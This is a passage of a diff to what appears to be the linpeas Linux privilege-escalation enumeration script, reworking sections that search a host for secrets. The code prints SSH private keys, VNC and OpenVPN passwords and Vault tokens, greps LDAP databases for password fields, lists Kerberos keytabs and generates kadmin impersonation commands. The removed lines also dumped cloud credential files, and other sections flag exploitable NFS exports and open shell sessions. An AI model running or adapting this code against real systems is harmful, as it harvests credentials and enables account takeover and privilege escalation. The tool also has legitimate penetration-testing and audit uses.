LDAP directories - printf $Y"[+] "$GREEN"Searching ldap directories and their hashes\n"$NC - ldap=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'ldap$') - if [ "$ldap" ]; then - printf "$ldap\n" - echo "The password hash is from the {SSHA} to 'structural'"; - printf "%s\n" "$ldap" | while read d; do cat "$d/*.bdb" 2>/dev/null | grep -i -a -E -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${C}[1;31m&${C}[0m,g"; done - else echo_not_found "ldap" - fi - echo "" + print_2title "Analizing VNC Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"\.vnc$\"`" ]; then echo_not_found ".vnc"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "\.vnc$" | while read f; do ls -ld "$f" | sed -${E} "s,\.vnc$,${SED_RED},"; for ff in $(find "$f" -name "passwd"); do ls -ld "$ff" | sed -${E} "s,passwd,${SED_RED},"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.c.*nf.*$\"`" ]; then echo_not_found "*vnc*.c*nf*"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.c.*nf.*$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.c.*nf.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.ini$\"`" ]; then echo_not_found "*vnc*.ini"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.txt$\"`" ]; then echo_not_found "*vnc*.txt"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.txt$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_VNC\" | grep -E \"vnc.*\.xml$\"`" ]; then echo_not_found "*vnc*.xml"; fi; printf "%s" "$PSTORAGE_VNC" | grep -E "vnc.*\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,vnc.*\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Ldap Files (limit 70)" + echo "The password hash is from the {SSHA} to 'structural'" + if ! [ "`echo \"$PSTORAGE_LDAP\" | grep -E \"ldap$\"`" ]; then echo_not_found "ldap"; fi; printf "%s" "$PSTORAGE_LDAP" | grep -E "ldap$" | while read f; do ls -ld "$f" | sed -${E} "s,ldap$,${SED_RED},"; for ff in $(find "$f" -name "*.bdb"); do ls -ld "$ff" | sed -${E} "s,.bdb,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E -i -a -o "description.*" | sort | uniq | sed -${E} "s,administrator|password|ADMINISTRATOR|PASSWORD|Password|Administrator,${SED_RED},g"; done; echo "";done; echo ""; + + + print_2title "Analizing Open VPN Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_OPEN_VPN\" | grep -E \"\.ovpn$\"`" ]; then echo_not_found "*.ovpn"; fi; printf "%s" "$PSTORAGE_OPEN_VPN" | grep -E "\.ovpn$" | while read f; do ls -ld "$f" | sed -${E} "s,\.ovpn$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "auth-user-pass.+" | sed -${E} "s,auth-user-pass.+,${SED_RED},g"; done; echo ""; - #-- SI) .ovpn files - printf $Y"[+] "$GREEN"Searching .ovpn files and credentials\n"$NC - ovpn=$(echo "$FIND_ETC\n$FIND_USR\n$FIND_HOME\n$FIND_TMP\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '\.ovpn') - if [ "$ovpn" ]; then - printf "$ovpn\n" - printf "%s\n" "$ovpn" | while read f; do - if [ -r "$f" ]; then - echo "Checking $f:" - cat "$f" 2>/dev/null | grep "auth-user-pass" | sed -${E} "s,auth-user-pass.*,${C}[1;31m&${C}[0m,"; - fi - done - else echo_not_found ".ovpn" - fi - echo "" #-- SI) ssh files - printf $Y"[+] "$GREEN"Searching ssl/ssh files\n"$NC - ssh=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E 'id_dsa.*|id_rsa.*|known_hosts|authorized_hosts|authorized_keys') - certsb4=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pem|.*\.cer|.*\.crt' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib.*') - if [ "$certsb4" ]; then certsb4_grep=`grep -L "\"\|'\|(" $certsb4 2>/dev/null`; fi - certsbin=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.csr|.*\.der' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') - clientcert=$(echo "$FIND_VAR $FIND_ETC $FIND_HOME $FIND_MNT $FIND_USR $FIND_OPT $FIND_PRIVATE $FIND_APPLICATIONS" | grep -E '.*\.pfx|.*\.p12' | grep -E -v '^/usr/share/.*' | grep -E -v '^/etc/ssl/.*' | grep -E -v '^/usr/local/lib/.*' | grep -E -v '^/usr/lib/.*') - sshagents=$(echo "$FIND_TMP" | grep -E 'agent.*') - homesshconfig=$(echo "$FIND_HOME $FIND_USR" | grep -E 'config' | grep "ssh") + print_2title "Searching ssl/ssh files" + if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=`grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null`; fi sshconfig="`ls /etc/ssh/ssh_config 2>/dev/null`" hostsdenied="`ls /etc/hosts.denied 2>/dev/null`" hostsallow="`ls /etc/hosts.allow 2>/dev/null`" - if [ "$ssh" ]; then - printf "$ssh\n" - fi + print_2title "Analizing SSH FILES Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"id_dsa.*$\"`" ]; then echo_not_found "id_dsa*"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"id_rsa.*$\"`" ]; then echo_not_found "id_rsa*"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"known_hosts$\"`" ]; then echo_not_found "known_hosts"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "known_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"authorized_hosts$\"`" ]; then echo_not_found "authorized_hosts"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_SSH_FILES\" | grep -E \"authorized_keys$\"`" ]; then echo_not_found "authorized_keys"; fi; printf "%s" "$PSTORAGE_SSH_FILES" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo ""; - grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${C}[1;31m&${C}[0m," + + grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," if [ "$TIMEOUT" ]; then privatekeyfilesetc=`timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null` @@ -2203,116 +2173,105 @@ if [ "`echo $CHECKS | grep SofI`" ]; then privatekeyfilesetc=`grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null` #If there is tons of files linpeas gets frozen here without a timeout privatekeyfileshome=`grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null` fi - + if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then - printf "Possible private SSH keys were found!\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi - if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m,"; fi + echo "" + print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED}," + if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi + if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi + echo "" fi - if [ "$certsb4_grep" ] || [ "$certsbin" ]; then - echo " --> Some certificates were found (out limited):" + if [ "$certsb4_grep" ] || [ "$$PSTORAGE_CERTSBIN" ]; then + print_3title "Some certificates were found (out limited):" printf "$certsb4_grep\n" | head -n 20 - printf "$certsbin\n" | head -n 20 + printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + echo "" fi - if [ "$clientcert" ]; then - echo " --> Some client certificates were found:" - printf "$clientcert\n" + if [ "$PSTORAGE_CERTSCLIENT" ]; then + print_3title "Some client certificates were found:" + printf "$PSTORAGE_CERTSCLIENT\n" + echo "" fi - if [ "$sshagents" ]; then - echo " --> Some SSH Agent files were found:" - printf "$sshagents\n" + if [ "$PSTORAGE_SSH_AGENTS" ]; then + print_3title "Some SSH Agent files were found:" + printf "$PSTORAGE_SSH_AGENTS\n" + echo "" fi if [ "`ssh-add -l 2>/dev/null | grep -v 'no identities'`" ]; then - echo " --> SSH Agents listed:" + print_3title "Listing SSH Agents" ssh-add -l + echo "" fi - if [ "$homesshconfig" ]; then - echo " --> Some home ssh config file was found" - printf "$homesshconfig\n" - printf "%s\n" "$homesshconfig" | while read f; do cat "$f" 2>/dev/null | grep -v "^$" | sed -${E} "s,User|ProxyCommand,${C}[1;31m&${C}[0m,"; done + if [ "$PSTORAGE_SSH_CONFIG" ]; then + print_3title "Some home ssh config file was found" + printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done + echo "" fi if [ "$hostsdenied" ]; then - echo " --> /etc/hosts.denied file found, read the rules:" + print_3title "/etc/hosts.denied file found, read the rules:" printf "$hostsdenied\n" - cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -${E} "s,.*,${C}[1;32m&${C}[0m," + cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," echo "" fi if [ "$hostsallow" ]; then - echo " --> /etc/hosts.allow file found, read the rules:" + print_3title "/etc/hosts.allow file found, trying to read the rules:" printf "$hostsallow\n" - cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -v "^$" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," echo "" fi if [ "$sshconfig" ]; then echo "" echo "Searching inside /etc/ssh/ssh_config for interesting info" - cat /etc/ssh/ssh_config 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${C}[1;31m&${C}[0m," + cat /etc/ssh/ssh_config 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED}," fi echo "" #-- SI) PAM auth - printf $Y"[+] "$GREEN"Searching unexpected auth lines in /etc/pam.d/sshd\n"$NC + print_2title "Searching unexpected auth lines in /etc/pam.d/sshd" pamssh=`cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth` if [ "$pamssh" ]; then - cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -${E} "s,.*,${C}[1;31m&${C}[0m," + cat /etc/pam.d/sshd 2>/dev/null | grep -v "^#\|^@" | grep -i auth | sed -${E} "s,.*,${SED_RED}," else echo_no fi echo "" - #-- SI) Cloud keys - printf $Y"[+] "$GREEN"Searching Cloud credentials (AWS, Azure, GC)\n"$NC - cloudcreds=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'credentials$|credentials\.db$|legacy_credentials\.db$|access_tokens\.db$|accessTokens\.json$|azureProfile\.json$') - if [ "$cloudcreds" ]; then - printf "%s\n" "$cloudcreds" | while read f; do - if [ -f "$f" ]; then #Check if file, here we only look for filenames, not dirs - printf "%s\n" "Trying to read $f" | sed -${E} "s,credentials|credentials.db|legacy_credentials.db|access_tokens.db|accessTokens.json|azureProfile.json,${C}[1;31m&${C}[0m,g" - if [ -r "$f" ]; then - cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" - fi - echo "" - fi - done - fi - echo "" - #-- SI) NFS exports - printf $Y"[+] "$GREEN"NFS exports?\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe\n"$NC - if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${C}[1;31;103m&${C}[0m," | sed -${E} "s,insecure,${C}[1;31m&${C}[0m," + print_2title "NFS exports?" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe" + if [ "`cat /etc/exports 2>/dev/null`" ]; then cat /etc/exports 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED}," else echo_not_found "/etc/exports" fi echo "" #-- SI) Kerberos - printf $Y"[+] "$GREEN"Searching kerberos conf files and tickets\n"$NC - printf $B"[i] "$Y"https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt\n"$NC + print_2title "Searching kerberos conf files and tickets" + print_info "https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt" kadmin_exists="`command -v kadmin`" klist_exists="`command -v klist`" - if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${C}[1;31m&${C}[0m,"; fi + if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi - - krb5=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'krb5\.conf|krb5.keytab|\.k5login') - printf "%s\n" "$krb5" | while read f; do + + printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do if [ -r "$f" ]; then if [ "`echo \"$f\" | grep .k5login`" ]; then echo ".k5login file (users with access to the user who has this file in his home)" - cat "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" elif [ "`echo \"$f\" | grep keytab`" ]; then echo "" echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords" - klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${C}[1;31m&${C}[0m,g" + klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" printf "`klist -k \"$f\" 2>/dev/null`\n" | awk '{print $2}' | while read l; do if [ "$l" ] && [ "`echo \"$l\" | grep \"@\"`" ]; then - printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${C}[1;31m&${C}[0m,g" + printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g" #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that fi done elif [ "`echo \"$f\" | grep krb5.conf`" ]; then ls -l "$f" - cat "$f" 2>/dev/null | grep default_ccache_name | sed -${E} "s,default_ccache_name,${C}[1;31m&${C}[0m,"; + cat "$f" 2>/dev/null | grep default_ccache_name | sed -${E} "s,default_ccache_name,${SED_RED},"; elif [ "`echo \"$f\" | grep kadm5.acl`" ]; then ls -l "$f" cat "$f" 2>/dev/null @@ -2323,83 +2282,50 @@ if [ "`echo $CHECKS | grep SofI`" ]; then klist 2>/dev/null || echo_not_found "klist" echo "" - #-- SI) kibana - printf $Y"[+] "$GREEN"Searching Kibana yaml\n"$NC - kibana=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'kibana\.y.*ml') - if [ "$kibana" ]; then - printf "$kibana\n" - printf "%s\n" "$kibana" | while read f; do - if [ -r "$f" ]; then - cat "$f" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v "^$" | grep -v -e '^[[:space:]]*$' | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${C}[1;31m&${C}[0m,"; - fi - done - else echo_not_found "kibana.yml" - fi - echo "" + print_2title "Analizing Knockd Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KNOCKD\" | grep -E \"knockd.*$\"`" ]; then echo_not_found "*knockd*"; fi; printf "%s" "$PSTORAGE_KNOCKD" | grep -E "knockd.*$" | while read f; do ls -ld "$f" | sed -${E} "s,knockd.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + + + print_2title "Analizing Kibana Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_KIBANA\" | grep -E \"kibana\.y.*ml$\"`" ]; then echo_not_found "kibana.y*ml"; fi; printf "%s" "$PSTORAGE_KIBANA" | grep -E "kibana\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,kibana\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#|^[[:space:]]*$" | sed -${E} "s,username|password|host|port|elasticsearch|ssl,${SED_RED},g"; done; echo ""; + + + print_2title "Analizing Elasticsearch Files (limit 70)" + echo "The version is $(curl -X GET '127.0.0.1:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" + if ! [ "`echo \"$PSTORAGE_ELASTICSEARCH\" | grep -E \"elasticsearch\.y.*ml$\"`" ]; then echo_not_found "elasticsearch.y*ml"; fi; printf "%s" "$PSTORAGE_ELASTICSEARCH" | grep -E "elasticsearch\.y.*ml$" | while read f; do ls -ld "$f" | sed -${E} "s,elasticsearch\.y.*ml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "path.data|path.logs|cluster.name|node.name|network.host|discovery.zen.ping.unicast.hosts" | grep -Ev "\W+\#|^#"; done; echo ""; - #-- SI) Knock - printf $Y"[+] "$GREEN"Searching Knock configuration\n"$NC - Knock=$(echo "$FIND_ETC\n$FIND_MNT" | grep -E '/etc/init.d/.*knockd.*') - if [ "$Knock" ]; then - printf "%s\n" "$Knock" | while read f; do - h=$(grep -R -i "defaults_file=" $f | cut -b 15-) ##Search string to know where is the default knock file - example - DEFAULTS_FILE=/etc/default/knockd - i=$(grep -R -i "please edit" $h | awk '{print $4}') ##Search string to know where is config file - example - # PLEASE EDIT /etc/knockd.conf BEFORE ENABLING - j=$(grep -R -i "sequence" $i) ##If we want we can show sequence number - 'hidded' - printf "Config Knock file found!: \n$i\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - printf " Sequence found!: \n$j\n" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - done - else echo_not_found "Knock.config" - fi - echo "" ##-- SI) Logstash - printf $Y"[+] "$GREEN"Searching logstash files\n"$NC - logstash=$(echo "$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_HOME\n$FIND_DIR_TMP\n$FIND_DIR_USR\n$FIND_DIR_OPT\n$FIND_DIR_USERS\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_MNT" | grep -E 'logstash') - if [ "$logstash" ]; then - printf "$logstash\n" - printf "%s\n" "$logstash" | while read d; do - if [ -r "$d/startup.options" ]; then + print_2title "Searching logstash files" + if [ "$PSTORAGE_LOGSTASH" ]; then + printf "$PSTORAGE_LOGSTASH\n" + printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do + if [ -r "$d/startup.options" ]; then echo "Logstash is running as user:" - cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${C}[1;34m&${C}[0m," | sed -${E} "s,$knw_usrs,${C}[1;32m&${C}[0m," | sed -${E} "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,root,${C}[1;31m&${C}[0m," + cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${C}[1;96m&${C}[0m," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${C}[1;95m&${C}[0m," | sed -${E} "s,root,${SED_RED}," fi - cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${C}[1;31m&${C}[0m," - cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${C}[1;31m&${C}[0m," + cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED}," + cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED}," done else echo_not_found fi echo "" - #-- SI) Elasticsearch - printf $Y"[+] "$GREEN"Searching elasticsearch files\n"$NC - elasticsearch=$(echo "$FIND_VAR\n$FIND_ETC\n$FIND_HOME\n$FIND_TMP\n$FIND_USR\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'elasticsearch\.y.*ml') - if [ "$elasticsearch" ]; then - printf "$elasticsearch\n" - printf "%s\n" "$elasticsearch" | while read f; do - if [ -r "$f" ]; then - cat $f 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -v -e '^[[:space:]]*$' | grep "path.data\|path.logs\|cluster.name\|node.name\|network.host\|discovery.zen.ping.unicast.hosts"; - fi - done - echo "Version: $(curl -X GET '10.10.10.115:9200' 2>/dev/null | grep number | cut -d ':' -f 2)" - else echo_not_found - fi - echo "" - #-- SI) Vault-ssh - printf $Y"[+] "$GREEN"Searching Vault-ssh files\n"$NC - vaultssh=$(echo "$FIND_ETC\n$FIND_USR\n$FIND_HOME\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E 'vault-ssh-helper\.hcl') - if [ "$vaultssh" ]; then - printf "$vaultssh\n" - printf "%s\n" "$vaultssh" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done + print_2title "Searching Vault-ssh files" + if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then + printf "$PSTORAGE_VAULT_SSH_HELPER\n" + printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" vault secrets list 2>/dev/null - echo "$FIND_ETC\n$FIND_HOME\n$FIND_USR\n$FIND_PRIVATE\n$FIND_APPLICATIONS\n$FIND_MNT" | grep -E '\.vault-token' | sed -${E} "s,.*,${C}[1;31m&${C}[0m," 2>/dev/null + printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null else echo_not_found "vault-ssh-helper.hcl" fi echo "" #-- SI) Cached AD Hashes adhashes=`ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null` - printf $Y"[+] "$GREEN"Searching AD cached hashes\n"$NC + print_2title "Searching AD cached hashes" if [ "$adhashes" ]; then ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null else echo_not_found "cached hashes" @@ -2407,11 +2333,11 @@ if [ "`echo $CHECKS | grep SofI`" ]; then echo "" #-- SI) Screen sessions - printf $Y"[+] "$GREEN"Searching screen sessions\n"$N - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC + print_2title "Searching screen sessions" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions" screensess=`screen -ls 2>/dev/null` if [ "$screensess" ]; then - printf "$screensess" | sed -${E} "s,.*,${C}[1;31m&${C}[0m," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," + printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m," else echo_not_found "screen" fi echo "" @@ -2419,187 +2345,119 @@ if [ "`echo $CHECKS | grep SofI`" ]; then #-- SI) Tmux sessions tmuxdefsess=`tmux ls 2>/dev/null` tmuxnondefsess=`ps auxwww | grep "tmux " | grep -v grep` - printf $Y"[+] "$GREEN"Searching tmux sessions\n"$N - printf $B"[i] "$Y"https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions\n"$NC + print_2title "Searching tmux sessions"$N + print_info 